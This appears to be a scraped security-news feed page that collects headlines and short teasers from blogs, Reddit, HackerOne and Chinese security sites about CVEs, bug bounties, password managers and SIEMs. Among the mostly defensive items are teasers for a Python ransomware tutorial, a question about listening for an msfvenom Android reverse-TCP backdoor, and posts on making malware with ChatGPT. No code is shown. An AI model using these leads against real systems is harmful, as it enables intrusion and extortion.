    When writing a bug report, it is crucial to keep in mind the audience who will be reading it. Program Owner Analysts may not have the same… Continue reading on Medium »
    How to scan a host with RustScan
    When performing a penetration test, one of the most crucial parts is scanning and enumeration. Because if you lose any important port at… Continue reading on Medium »
    PARTICIPATE IN TERNOA BUG CAMPAIGN
    A bug bounty program, also known as a vulnerability rewards program (VRP), is a crowdsourcing project that rewards people for finding and… Continue reading on Medium »
    How to Make Ransomware with Python
    Disclaimer: This tutorial is just for educational purposes, don’t try to break any computer except yours. If you try to make real… Continue reading on Medium »
    How to start bug bounty for beginners ($100+ /Day)
    Here are some steps for beginners to get started with a bug bounty program: Continue reading on Medium »
    Bug Hunting 101: Multi-Factor Authentication OTP Bypass
    TL;DR- A step-by-step walkthrough on how to bypass one-time passwords, including various methods of exploitation and links to further… Continue reading on The Gray Area »
  • Open

    A trio of dubious denial-of-service security vulnerability reports
    Article URL: https://devblogs.microsoft.com/oldnewthing/20230117-00/?p=107722 Comments URL: https://news.ycombinator.com/item?id=34433617 Points: 1 # Comments: 0
  • Open

    Curling
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Unlock Your Cybersecurity Potential: Navigating the Career Paths
    Are you fascinated by the world of cybersecurity and wondering which career path is right for you? Continue reading on Medium »
    Unlock Your Cybersecurity Potential: Navigating the Career Paths
    Are you fascinated by the world of cybersecurity and wondering which career path is right for you? Continue reading on System Weakness »
    ChatGPT for Offensive and Defensive Cyber
    From research to writing SIEM rules, offensive scripts to report writing, learn how ChatGPT can be used for cybersecurity. Continue reading on Medium »
    Applications’ DoS based on Data Stress using Python
    The stress attack is similar to the database stress test in that both involve subjecting the application to large volumes of information… Continue reading on System Weakness »
    Applications’ DoS based on Data Stress using Python
    The stress attack is similar to the database stress test in that both involve subjecting the application to large volumes of information… Continue reading on Medium »
    Atomic Red Team Theory
    Atomic Red Team is an open-source project that provides a framework for testing the effectiveness of security controls in an organization… Continue reading on Medium »
  • Open

    Downloading stuff.
    Now to start with - I am not going to touch wget here. There is already a wealth of info about it here. Check the sidebar and go from there. I’ll go thru my process to download var. files (not just OD’s) as some may find it helpful. Maybe even have tips & tricks to streamline muh flow! FINDING DOWNLOADS Not a how-to-search per-se, more just a pointer. On chromium (using less and less due to resource hogging) you can basically add your own search operand by following the process here - https://support.google.com/chrome/answer/95426 here as an eg. is 1 of mine (note this is for searching for porn & NSFW but the system is the same for most sites) Fuskator fusk https://fuskator.com/search/%s/quality/ Firefox doesn’t make it so easy unfortunately - you can add & remove the approv…
    Tons of old iOS apps (iOS 2 to 8)
    submitted by /u/themariocrafter [link] [comments]
    Halloween costume images
    submitted by /u/themariocrafter [link] [comments]
  • Open

    Sudoedit can edit arbitrary files (CVE-2023-22809)
    submitted by /u/0xdea [link] [comments]
    Gold Digger: a simple tool to quickly discover credentials/sensitive information in files recursively
    submitted by /u/ustayready [link] [comments]
    Java XML security issues and how to address them
    submitted by /u/got_nations [link] [comments]
    Nothing new under the Sun - Discovering and exploiting a CDE bug chain
    submitted by /u/0xdea [link] [comments]
    Tailscale bug allowed a person to share nodes from other tailnets without auth
    submitted by /u/Security_Chief_Odo [link] [comments]
  • Open

    How easy is migrating from last pass
    Let’s say I am going to migrate from lastpass to another password manager. Other than writing down ( or copy pasting to text editor) all my passwords, then entering the sites one by one under the new password manager, is there another easier way to do it? Like a common export import format between lastpass and another password manager? submitted by /u/mscheckfar [link] [comments]
    Likely scenario or more like fiction?
    Hello, I was wondering if you could evaluate a scenario for me. Background: Fully updated iphone with no jail break or whatever modifications. Has not yet been set up yet so when you turn it on the welcome message appears and asks you to create an iCloud account and a username etc. there is no passcode or anything because the phone is not even set up yet. The only thing that has happened since it has been opened from box is the SIM card has been inserted into it. left unattended for 5-10 minutes. Hypothetical scenario: a bad actor comes in during those 5-10 minutes, takes the phone somewhere, inserts it into some machine and the machine uploads some kind of virus or malware or key logger into it that controls the device. Allows user to remote into it or see what’s going on like a MDM device or something, idk. Ambient listening and stuff. Questions: is this scenario likely? Why or why not? I know certain software exists that brute forces into passcodes that the fbi or whatever has, and maybe even downloads data. I guess from there with access to an unlocked device they could install some type of spyware or something. But a. That would be a very sophisticated actor b. That iPhone has been set up and has data on it in my scenario it is a iPhone that is still in welcome mode so can someone install virus / malware / whatever into that? So overall, Is this scenario possible or likely? And if so, would a simple factory reset clear things up? Thank you!!! submitted by /u/Normal-Question-1994 [link] [comments]
    Whatsapp vs Telegram chat and security
    hi, from the network security perspective, is there any real difference between Whatsapp chats and Telegram encrypted chats? Both claim to be end-to-end encrypted. I am not speaking on topic like "whatsapp is a Meta product while TG is not". thankyou! submitted by /u/g-simon [link] [comments]
    Observing the data a process writes to a file?
    I have an application that logs data to a file and immediately deletes it. I've been using all your standard Windows tools (procmon/ process explorer) to try and see exactly what data is being written, but having no luck. Can anyone recommend a way to actually see waht data is being written to a file by a Windows application? submitted by /u/security_intern [link] [comments]
  • Open

    Major Conference Roundup: Perspectives from Defcon, RSA, Black Hat, Gartner, and more!
    The 2022 conference schedule ramped up in the second half of the year, and as you might expect, TrustedSec both attended and spoke at many of them. Within our organization, we have many different perspectives and focused interests, so we sampled opinions from some of the people who attended. We were curious how our experiences... The post Major Conference Roundup: Perspectives from Defcon, RSA, Black Hat, Gartner, and more! appeared first on TrustedSec.
  • Open

    How I passed the AWS security specialty certification in 2023
    Another year and another cert ! Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    No content preview
    Software Development Lifecycle (SDLC), DevSecOps, SAST, DAST And IAST Concepts
    No content preview
    How to Find Compromised Credentials on Darkweb?
    How many of you often see messages and alerts saying “Your credentials are compromised and found on darkweb”. In this article, let’s… Continue reading on InfoSec Write-ups »
    Explore Darkweb With These Surface Web Resources: A Large Collection of Darkweb Onion Links
    This article presents you with a list of surface web sites that contain a vast number of onion URLs that you can use to explore and deep… Continue reading on InfoSec Write-ups »
    Full Team Takeover
    No content preview
    Internet Down!? Here’s how to solve it…
    No content preview
    How I found 40+ Directory Listing Vulnerabilities of Source Code Disclosure via Exposed WordPress…
    No content preview
    How I found Source Code Disclosure via Exposed .git Folder using Google Dorks
    No content preview
  • Open

    How I passed the AWS security specialty certification in 2023
    Another year and another cert ! Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    No content preview
    Software Development Lifecycle (SDLC), DevSecOps, SAST, DAST And IAST Concepts
    No content preview
    How to Find Compromised Credentials on Darkweb?
    How many of you often see messages and alerts saying “Your credentials are compromised and found on darkweb”. In this article, let’s… Continue reading on InfoSec Write-ups »
    Explore Darkweb With These Surface Web Resources: A Large Collection of Darkweb Onion Links
    This article presents you with a list of surface web sites that contain a vast number of onion URLs that you can use to explore and deep… Continue reading on InfoSec Write-ups »
    Full Team Takeover
    No content preview
    Internet Down!? Here’s how to solve it…
    No content preview
    How I found 40+ Directory Listing Vulnerabilities of Source Code Disclosure via Exposed WordPress…
    No content preview
    How I found Source Code Disclosure via Exposed .git Folder using Google Dorks
    No content preview
  • Open

    How I passed the AWS security specialty certification in 2023
    Another year and another cert ! Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    No content preview
    Software Development Lifecycle (SDLC), DevSecOps, SAST, DAST And IAST Concepts
    No content preview
    How to Find Compromised Credentials on Darkweb?
    How many of you often see messages and alerts saying “Your credentials are compromised and found on darkweb”. In this article, let’s… Continue reading on InfoSec Write-ups »
    Explore Darkweb With These Surface Web Resources: A Large Collection of Darkweb Onion Links
    This article presents you with a list of surface web sites that contain a vast number of onion URLs that you can use to explore and deep… Continue reading on InfoSec Write-ups »
    Full Team Takeover
    No content preview
    Internet Down!? Here’s how to solve it…
    No content preview
    How I found 40+ Directory Listing Vulnerabilities of Source Code Disclosure via Exposed WordPress…
    No content preview
    How I found Source Code Disclosure via Exposed .git Folder using Google Dorks
    No content preview
  • Open

    Looking for FREE resources to learn
    Hey everyone! I'm happy to have joined the community! I'm very new at this, but not an absolute starter. I'm building a Discord server to share the learning resources I gather along the way. https://discord.gg/Qe3Tfnp2 I'd love if you'd help me test it, as it is in Beta still. And maybe you can share some FREE resources in the comments? (Reason why I'm asking for them to be free is because I'm writing from latam and I want to teach unpriviledge kids/people about red and blue teaming. Thank you so much for being kind and patiente with noobs like us. My pronouns are She/Her. TYSM submitted by /u/ZestycloseRaccoon466 [link] [comments]
  • Open

    Fuzzing with Radamsa in BlackArch
    Radamsa is a test case generator, it receives some input data and then it scrambles it to return some random data. Random is truly random… Continue reading on Medium »
  • Open

    Fuzzing with Radamsa in BlackArch
    Radamsa is a test case generator, it receives some input data and then it scrambles it to return some random data. Random is truly random… Continue reading on Medium »
  • Open

    SecWiki News 2023-01-18 Review
    开源软件安全性分析 by ourren 利用空间测绘进行威胁分析 by ourren 2022年全球高级持续性威胁(APT)研究报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-18 Review
    开源软件安全性分析 by ourren 利用空间测绘进行威胁分析 by ourren 2022年全球高级持续性威胁(APT)研究报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    Chinese Playful Taurus Activity in Iran
    Chinese APT Playful Taurus is using a new backdoor named Turian. Analysis suggests several Iranian government networks have likely been compromised. The post Chinese Playful Taurus Activity in Iran appeared first on Unit 42.
  • Open

    FreeBuf 早报 | BlackCat等勒索软件正威胁医疗领域;去年GDPR开出超30亿美元罚单
    欧洲数据保护委员会在2022年开出的罚款金额约为29亿欧元(约 31 亿美元),是 2021 年开出的罚款金额的两倍多。
    2022年中国网络安全行业投融资一览 | FreeBuf年度盘点
    按照时间顺序,盘点2022年国内网络安全行业的具体投融资事件。
    震碎三观,谷歌广告竟然传播恶意软件
    只是因为点击了Google 搜索结果中的一个广告,几个小时后Alex的账户遭到了洗劫。
    日产汽车北美数据泄露,系第三方供应商暴露
    泄露的客户数据包括全名、出生日期和NMAC账号(日产金融账户)。
    攻击者可滥用 GitHub 代码空间传递恶意软件
    好消息是,研究人员设计的攻击技术尚未在野外攻击中得到应用。
  • Open

    【漏洞通报】Weblogic远程代码执行漏洞(CVE-2023-21839)
    WebLogic 存在远程代码执行漏洞,该漏洞允许未经身份验证的攻击者通过IIOP协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server...
    【安全通报】Oracle 一月更新多个高危漏洞
    近日,Oracle官方 发布了 2023 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 327 个漏洞。此次修复的漏洞中包...
  • Open

    【漏洞通报】Weblogic远程代码执行漏洞(CVE-2023-21839)
    WebLogic 存在远程代码执行漏洞,该漏洞允许未经身份验证的攻击者通过IIOP协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server...
    【安全通报】Oracle 一月更新多个高危漏洞
    近日,Oracle官方 发布了 2023 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 327 个漏洞。此次修复的漏洞中包...

  • Open

    I use metasploit for ethical hacking, I have a backdoor android/reverse_tcp I but it using msfveren and pass to it my external ip and port 4444 , how to use msfconsole to listen to the tcp connection that comming to my machine, noted thwt I set a port forwarding with the machine ip and enabled por
    submitted by /u/Odaymard [link] [comments]
    Ransomware Diaries: Volume 1
    submitted by /u/dmchell [link] [comments]
  • Open

    Should i save my main email info in a password manager?
    Im not sure what i should include and exclude from a password manager. Putting your main email makes me feel a bit uneasy even if its encrypted submitted by /u/BeneficialAddendum24 [link] [comments]
    Need recommendation for a password manager
    I keep getting answers between 1password and bitwarden. Asking google is useless since every review site puts either one of them at the top and then another site puts them on 5th place etc ​ Also, should i make a new email account for this manager alone or is it pointless? One of my email accounts has been exposed to earlier breaches so i get like 5-20 login attempts by bots everyday, all unsuccessful ofc, but its annoying anyway Edit: Went with 1password. Thanks for all the suggestions :) submitted by /u/BeneficialAddendum24 [link] [comments]
    To spice up security in a password manager, should you only include parts of the password rather than the full password?
    Example, you put in a 30 letter/symbol/number but then you add another 4 letters/numbers excluded from the saved password in the manager, like a pincode and those 4 last numbers are different on every password and you have either memorized those 4 or written them down on a paper? That way, if SOMEHOW your vault was to be compromised, the hacker doesn't have the full password anyway. Is this a good or dumb idea? I know the chances of this happening is extremely low, but you can't be too careful? submitted by /u/BeneficialAddendum24 [link] [comments]
    Microsoft LAPS vs custom script via NinjaRMM
    Microsoft LAPS is difficult to implement for roaming users which most are these days. Having a RMM agent on them introduces an alternative like the one outlined in this article. At the end of the article they say it isn't the best in terms of password storage which I agree with. However the same can kind of be said for LAPS storing plain text in Active Directory unless I'm missing something. Just wondering if its six in one half a dozen in the other or if one has a clear advantage over the other that I am missing. Purpose Built Local Account Password Rotation for NinjaRMM | MSP Automator submitted by /u/junkaccount1999 [link] [comments]
    What were your criteria for choosing a SIEM and why?
    Hi there. I worked closely only with Splunk SIEM, as an engineer and as a SOC analyst and as a threat hunter and I loved this software. My personal criteria in choosing SIEM products may be strange, but I'm mainly interested in whether I can build complex searches and dashboards for my security investigations. I'm also learning ELK now, which is more difficult for me after Splunk, but I think the potential is the same, although I find it diffucult that there are 3 different languages for data search. Splunk used a syntax similar to bash scripts in Linux, and ELK has its jason queries, which is not very convenient for me yet, because I have to write more code, but I like this product. I've had experience with McAfee SIEM and AlienVault, and those products had a lot of tools already buil…
    Experience with Microsoft Compliance Manager?
    Microsoft offers a compliance solution for enterprise organizations at compliance.microsoft.com From the portal, it looks like this tool can track your adherence to common regulations and standards like ISO 27001, showing you which requirements are already covered by Microsoft and allowing you to register what you covered yourself. You can also classify certain types of data and track where they are used/stored. It seems there's also an option to see which apps are in use, but we already have that overview in MS Intune. They offer a free 90 day trial, but I'm hesitant to start it since I don't have an idea of how much time I should invest to get the most out of such a trial. Also, I don't want to start a trial with a tool just because it's from a supplier that we're already using without looking at the alternatives first. I'd love to hear if anyone is already using this tool, what benefits it brings you, and how it compares to similar tools. Also, I'm really interested in the time it took to set up the tool properly, and the time it takes to follow-up on the reports that are generated. submitted by /u/Extra-Guitar-9515 [link] [comments]
    Encryption !!
    How can one identify if the data flow within the organization in-transit and data storage are protected by appropriate cryptographic algorithm ? submitted by /u/NoLion5101 [link] [comments]
    what was the name of the tool that does risk analysis on imported libraries?
    Hi All, Few weeks ago, I saw a tool on netsec subreddit. The tool was analyzing the imported libraries on a project. It was checking how popular the library, if the e-mail address of the maintainer can be hijacked, if the library has some malicious code in them etc. it was a kind of risk analysis tool for imported libraries. I forgot the name of this tool and couldn't find it by searching. If someone can help me to find it, that would be great submitted by /u/utku1337 [link] [comments]
  • Open

    What did I found?
    CEH v12 Continue reading on Medium »
    Hacktoria — The Sleeper Cell
    Ok, this was quick and simple. I solved it in four steps: Continue reading on Medium »
    The Open-Source Technique That Led Me To Access Thousands Of Students Academic Record- Syed Rizwan
    Hii I’m Syed rizwan and this is my first vulnerability submission in 2023. Continue reading on Medium »
    Means about “Googlosint”…
    For a long time, OSINT in the West has been associated with Google — searching for information through Google. This led me to want to… Continue reading on Medium »
  • Open

    OpenAdmin (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Heist (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
  • Open

    HTML INJECTION on https://adobedocs.github.io/JourneyAPI/ due to outdated SWAGGER UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1744212
    DOM XSS at `https://adobedocs.github.io/indesign-api-docs/?configUrl={site}` due to outdated Swagger UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736327
  • Open

    AWS CloudTrail vulnerability: Undocumented API allows CloudTrail bypass
    Article URL: https://securitylabs.datadoghq.com/articles/iamadmin-cloudtrail-bypass/ Comments URL: https://news.ycombinator.com/item?id=34420752 Points: 12 # Comments: 0
  • Open

    Intel or AMD for Forensic Workstations?
    Core 9 or Threadripper go…… submitted by /u/Thalek [link] [comments]
    A New Program Execution Artifact - Windows 11 22H2 Update!
    Good morning, The first new publicly released episode of 2023 is now available. Check out this important video covering a new evidence of execution artifact introduced in Windows 11 22H2. ----- In this episode, we'll take a look at a new Windows 11 Pro 22H2 program execution artifact discovered in late December 2022. We'll cover the basics and then look at the artifact in action on a Windows 11 system. Episode: https://www.youtube.com/watch?v=rV8aErDj06A Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    Hacktivists Leak 1.7TB of Cellebrite, 103GB of MSAB Data
    submitted by /u/Complex-Awareness-77 [link] [comments]
  • Open

    From Error_Log File(P4) To Company Account Takeover(P1) and Unauthorized Actions On API
    Hi Everyone,My name is Muhanad Israiwi. I’m Bug Bounty Hunter,Software Engineering Student At Amman Arab University. Continue reading on Medium »
  • Open

    Hacking ICS Historians: The Pivot Point From IT to OT
    submitted by /u/derp6996 [link] [comments]
    Security audit of Git
    submitted by /u/joernchen [link] [comments]
    AWS CloudTrail vulnerability: Undocumented API allows CloudTrail bypass | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
    Creating a polymorphic malware using ChatGPT
    submitted by /u/ES_CY [link] [comments]
    Introducing RPC Investigator
    submitted by /u/Gallus [link] [comments]
    The misadventures of SPF: Delivering SPF authenticated emails on behalf of the Ukrainian MoD, MIT and 1000+ others.
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
  • Open

    简记一次Tp3框架审计之旅
    MVC框架是代码审计必需学习的知识,这里以TpV3.2.3框架为例,进行一次对MVC框架代码的漏洞审计。
    FreeBuf 早报 | Avast 发布免费勒索软件解密器;亚马逊T95电视盒隐藏恶意软件
    安全公司 Avast 发布了BianLian勒索软件的免费解密器,允许恶意软件的受害者恢复锁定的文件。
    2023年网络安全趋势预测TOP 20 | FreeBuf年度盘点
    2023 年网络安全仍将是首要考虑的一年,本文整理了多家权威机构及网安行业预测,都是网安人关心的问题。
    亚马逊销售的 Android 电视盒,正在悄悄窃取你的数据
    专家发现,在亚马逊和全球速卖通上出售的 T95 Android 电视盒预装了复杂的恶意软件。
    密码应用安全性评估要点之动态口令技术常见问题探讨
    本文总结了常见的动态口令认证技术,对动态令牌和动态令牌认证系统的主要功能和安全要求进行了简述,并提出了一些建议。
    70% 的应用程序发布 5 年后,至少包含一个漏洞
    应用程序发布五年后,至少 70% 会包含一个安全漏洞。
    最新报告:Java、.NET安全性最低?
    超过四分之三使用 Java 和 .NET 编写的应用程序至少存在一个以上的 OWASP Top 10 漏洞。
  • Open

    Help with arm exploitation
    Hello, I’m trying to exploit a web server running on ARM machine. I have a problem sending the payload to overflow the PC. I can’t send the payload with a python script so I have to either edit the javascript function sending the GET request, or edit the packet with fiddler. When I overflow the PC (after a x 65 filling the stack) by editing the javascript source it adds “0x2c after each value. For example: I enter 0xa4a4a4a4 so the stack is going to be 0xa4 0x2C 0xa4 0x2C 0xa4 0x2C 0xa4 0x2c. When editing the packet with fiddler, it send gibberish for some reason. I saw that in python you use ‘b’ prefix like b’0xa4a4a4a4’, but I can’t use python. Anyone knows how to do this in Javascript? Thank you very much. submitted by /u/yoni58360 [link] [comments]
    How do you decide what to exploit?
    I am trying to understand how you all narrow down on the what to exploit? Like does someone (say your employer) tell you to exploit something, you randomly pickup something, you look at cve and try exploiting, you discover the vulnerability and then trying to exploit etc. Thanks for sharing your thoughts submitted by /u/flylikegaruda [link] [comments]
  • Open

    SecWiki News 2023-01-17 Review
    玩转CodeQLpy之用友GRP-U8漏洞挖掘 by ourren 关于大模型时代软件智能化开发的一点展望 by ourren 安全开发之Pcshare流程分析 by ourren 一文梳理Code Review方法论与实践总结 by ourren 将迁移学习应用于网络安全:通过漏洞描述预测漏洞的可利用性 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-17 Review
    玩转CodeQLpy之用友GRP-U8漏洞挖掘 by ourren 关于大模型时代软件智能化开发的一点展望 by ourren 安全开发之Pcshare流程分析 by ourren 一文梳理Code Review方法论与实践总结 by ourren 将迁移学习应用于网络安全:通过漏洞描述预测漏洞的可利用性 by ourren 更多最新文章,请访问SecWiki
  • Open

    Sermons
    http://delongdirect.com/sermons/ https://www.reliancechurch.org/app_folder/Sermons/ https://hopewellbc.com/wp-content/uploads/sermons/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    2023 Resolutions for Script Kiddies
    Introduction 2022 was a tough year. It seemed like no one was safe. Nvidia, Samsung, Ubisoft, T-Mobile, Microsoft, Okta, Uber—and those were just some of Lapsus$’s breaches. What’s a Script Kiddie to do to be better protected in 2023? Another year in the books, and it was another big year for cybersecurity. While 2022 did... The post 2023 Resolutions for Script Kiddies appeared first on TrustedSec.
  • Open

    eLFI already solved it, better get going #BUGCROWD Challenge Walkthrough
    No content preview
  • Open

    eLFI already solved it, better get going #BUGCROWD Challenge Walkthrough
    No content preview
  • Open

    eLFI already solved it, better get going #BUGCROWD Challenge Walkthrough
    No content preview
  • Open

    【漏洞通报】Harbor 镜像仓库未授权访问漏洞
    Harbor 镜像仓库存在配置不当导致的访问控制缺陷,攻击者可通过页面搜索镜像名称,绕过登陆验证逻辑,直接查看结果中未授权的私有镜像仓库并获取仓库信息(Pull...
  • Open

    【漏洞通报】Harbor 镜像仓库未授权访问漏洞
    Harbor 镜像仓库存在配置不当导致的访问控制缺陷,攻击者可通过页面搜索镜像名称,绕过登陆验证逻辑,直接查看结果中未授权的私有镜像仓库并获取仓库信息(Pull...

  • Open

    rsbkb: a Rust CLI tool to easily chain operations (CyberChef-like) through pipes. Other utils as a bonus.
    submitted by /u/alain_proviste [link] [comments]
    Unauthenticated Configuration Export in Multiple WAGO Products
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    [CVE-2023-0179] Linux kernel stack buffer overflow in nftables: PoC and writeup
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    Cortex XDR - query on behaviour based detection
    Any Cortex XDR users in house? Was wondering how can i check if cortex xdr would have behaviour based protection from a specific vulnerability exploit on managed exndpoints? submitted by /u/Odd-Feed-9797 [link] [comments]
  • Open

    SANS FOR85 - live vs in person
    ** title typo: this is for FOR585*** For those who took FOR585 from SANS in the live Web format, did you feel that you missed out on anything by taking it live instead of in person? Also, any general comments on the course? submitted by /u/Redditor2597 [link] [comments]
    mysql db forensics
    Could you give me instructions or good resources to learn mysql db forensics? Including what can we analyse when mysql logs are not enabled (except err log).? My main focus currently is MySql running on Ubuntu submitted by /u/dum2dum [link] [comments]
  • Open

    Protecting Your Telegram Accounts: Best Security Practices
    Uncovering the Top Tactics to Keep Your Anonymity Intact and Stay Safe Continue reading on Medium »
    OhSINT ON TRYHACKME
    What is OSINT in cyber security? Continue reading on Medium »
  • Open

    How does DUO fob work?
    I went to my University's IT desk today and I told them I'm not using a smart phone anymore. They gave me a fob with a screen that generates passcodes by pressing a button. As far as I know, it has no internet connection, so it must be using some seed to generate "random" numbers and the server must also know about this seed to match the generated passcodes. Two things I would like to understand. ​ How does the fob sync with the server? I generate passcodes that I don't use sometimes. When I asked the IT guy about this, he told me it can get desynced in rare occasions. I would like to know why it doesn't always happen. Is there a way I can pull this seed from the fob and store it on my computer? If yes, would that be helpful for any would-be-attackers? Edit: read the following on Duo website. What does it suggest? If your Duo token is falling out of sync, it may be due to one of the following reasons: The button is pressed many times (approximately 20 times) without successfully authenticating with Duo. For example, if a token is stored in a bag, it may cause the button to accidentally be pressed many times. The battery is dying because the token is old or has been used very frequently. Generally, the Duo token battery should last for a minimum of two years. ​ submitted by /u/SteveSonOfJobs [link] [comments]
    Your in Holyday got Robbed, SHTF situation etc.
    Imagine the following, you are in Holyday and got robbed you lost the phone and have just some left money and your passport in the Hotel. So not too bad. But you want get back on track get online contact your friends etc. ?!? Have you prepeard for a siuation like this? Have you ever one expirienced? What did you do? Do you remember your google passwords? 2FA codes how to get them? What are you strategies. Do you buy a cheap phone and connect your google/iPhone account? Now 2FA is in the way...hm Thanks for sharing your tipps and expertise. submitted by /u/chris-78 [link] [comments]
    Certificate Based Authentication (CBA) Error
    I'm working on setting up CBA for a SharePoint Online instance. I've followed Microsoft's documentation (links below) to setup and configure Azure AD. User attribute altSecurityIdentities contains the X509: and X509: values AD Connect is configured to synchronize the on-prem attributes into Azure AD Verified that the certificateUserIds attribute in the Azure AD user object contains the same information from the altSecurityIdentities attribute on-prem Set the Authentication Strength to "Certificate Based Authentication (Multi-Factor) (have also tested with Single-Factor) under Conditional Access Created an Authentication Context under Conditional Access Created a Conditional Access Policy with the following settings Users = specific user (my non admin account) …
    What non-expencise SIEM can you suggest?
    Rigth now we are using AlienVault, but iAlienVault is end of sale and we can't continue with this. It was a super cheap SIEM that covered our needs, but it wasn't customizable. As a person who worked with Splunk for many years before, the functionality was unsatisfactory to me, but my organization can't afford lavish solutions. My eyes fell on Security Onion with a paid support subscription. My own preferences was ELK, but for ~30gb/day it costs almost 100k USD per year and it's out of budget. What other cost-effecte SIEM could you offer? submitted by /u/athanielx [link] [comments]
    When it's necessary to implement a SIEM in a company?
    I'm trying to understand the importance about a SIEM and how it would be a good option for a type of business or industry. For example, I've read you can't start a SOC without a SIEM, because at least you need to monitor and centralise everything you have to give the service of cybersecurity to any client. Now, if you're a on a mid-size or big company and you have sensible data like medical or military. It should be a good option to implement a SIEM? Why yes or not? submitted by /u/MrNoodlesLearns [link] [comments]
  • Open

    GitHub Security Lab (GHSL) Vulnerability Report: Insufficient path validation in ReceiveExternalFilesActivity.java (GHSL-2022-060)
    ownCloud disclosed a bug submitted by atorralba: https://hackerone.com/reports/1650270 - Bounty: $50
  • Open

    SecWiki News 2023-01-16 Review
    JPCERT/CC 如何在云端自动化恶意软件分析 by Avenger 文件上传漏洞总结 by SecIN社区 SecWiki周刊(第463期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-16 Review
    JPCERT/CC 如何在云端自动化恶意软件分析 by Avenger 文件上传漏洞总结 by SecIN社区 SecWiki周刊(第463期) by ourren 更多最新文章,请访问SecWiki
  • Open

    CVE-2023-0179: Linux kernel stack buffer overflow in nftables: PoC and writeup
    Article URL: https://seclists.org/oss-sec/2023/q1/20 Comments URL: https://news.ycombinator.com/item?id=34400478 Points: 3 # Comments: 1
  • Open

    Linux hacks, including newest CVE
    There are many ways to hack linux. This collection of kernel exploits is a great start. Continue reading on Medium »
    Automations in Continuous Vulnerability Management
    What is Continuous Vulnerability Management? Continue reading on Insider Engineering »
  • Open

    Linux hacks, including newest CVE
    There are many ways to hack linux. This collection of kernel exploits is a great start. Continue reading on Medium »
    Automations in Continuous Vulnerability Management
    What is Continuous Vulnerability Management? Continue reading on Insider Engineering »
  • Open

    2022年FreeBuf年度作者Top 10排行榜出炉
    感谢大家2022年对FreeBuf的认可和支持,来年请继续多多支持,我们一起打造一流的网络安全门户网站。
    FreeBuf 早报 | 滴滴恢复新用户注册;多位台湾名人个人信息疑外泄
    台湾华航疑似遭遇黑客攻击,大批旅客资料外泄到互联网上,其中包括赖清德、张忠谋、林志玲等数十位名人。
    历时500多天,滴滴出行被放出来了
    2023年1月16日,滴滴出行恢复新用户注册,但旗下APP依旧未在各大应用商店上架。
    CIS 2022 网络安全创新大会公开课回顾 | 上海主会场
    CIS 2022网络安全创新大会上海主会场精彩议题回顾将在FreeBuf公开课上线啦。
    CIS 2022 网络安全创新大会公开课回顾 | 线上专场
    14位嘉宾就各自的议题共话网络安全行业新趋势、新技术和新对策。
    TikTok又受挫,因无法轻易拒绝Cookie在法国被罚500万欧元
    法国国家信息和自由委员会声称,Tiktok没有提供直接的拒绝Cookie选项,平台也未能充分告知用户不同 Cookie 的使用目的。
    工业和信息化部等十六部门关于促进数据安全产业发展的指导意见
    《指导意见》指出,到2025年,数据安全产业规模超过1500亿元,年复合增长率超过30%。
    如何做好开源代码治理 | FB甲方安全 Talk 会直播回顾
    从研究咨询公司 Gartner 统计数据来看,应用程序建设中 80%-90% 的软件工程师会使用开源组件。
    SocialFish:一款功能强大的网络钓鱼测试与信息收集工具
    SocialFish是一款功能强大的网络钓鱼测试与信息收集工具,可帮助研究人员执行网络钓鱼测试或完成信息收集工作。
    nmap_vulners:一个使用已知服务信息提供漏洞数据的强大NSE脚本
    nmap_vulners是一款功能强大的NSE脚本,能够使用已知服务相关的信息来向广大研究人员提供漏洞数据。
    拨云见日,我们需要什么样的零信任?
    零信任从提出到现在历经10余年,逐渐被业内认可,并得到空前的发展,背后的原因是什么呢?
  • Open

    Books, Microsoft Software, and mirrors of other large Open Directories
    submitted by /u/themariocrafter [link] [comments]
  • Open

    Wi-Fi Geolocation, Then and Now
    I've always been fascinated by the information maintained in the Windows Registry. But in order to understand this, to really get a view into this, you have to know a little bit about my background. The first computer I remember actually using was a Timex-Sinclair 1000, just like the one in the image shown to the right. You connected it to the TV, programs were created via the keyboard and usually copied from "recipes" in the manual or in a magazine, and the "programs" could be saved to or loaded from a tape in a tape recorder. Yes, you read that right...a tape recorder. I was programming BASIC programs on this system, and then on a Mac IIe. After that, it was the Epson QX-10, and then for a very long time, in high school and then in college (I started college in August, 1985), the TRS-80.…
  • Open

    JavaScript Static Analysis Tools for Vulnerability Detection in Node.js Packages
    Article URL: https://arxiv.org/abs/2301.05097 Comments URL: https://news.ycombinator.com/item?id=34395758 Points: 2 # Comments: 1

  • Open

    Full Account Take Over by very simple trick.
    Hi, This is @xerox0x1, This is my first write-up, So pardon me if anything slipped. And Have fun! Continue reading on Medium »
    I Found Information Exposed In GitHub,What Next?
    Hi Everyone,My name is Muhanad Israiwi. I’m Bug Bounty Hunter,Software Engineering Student At Amman Arab University. Continue reading on Medium »
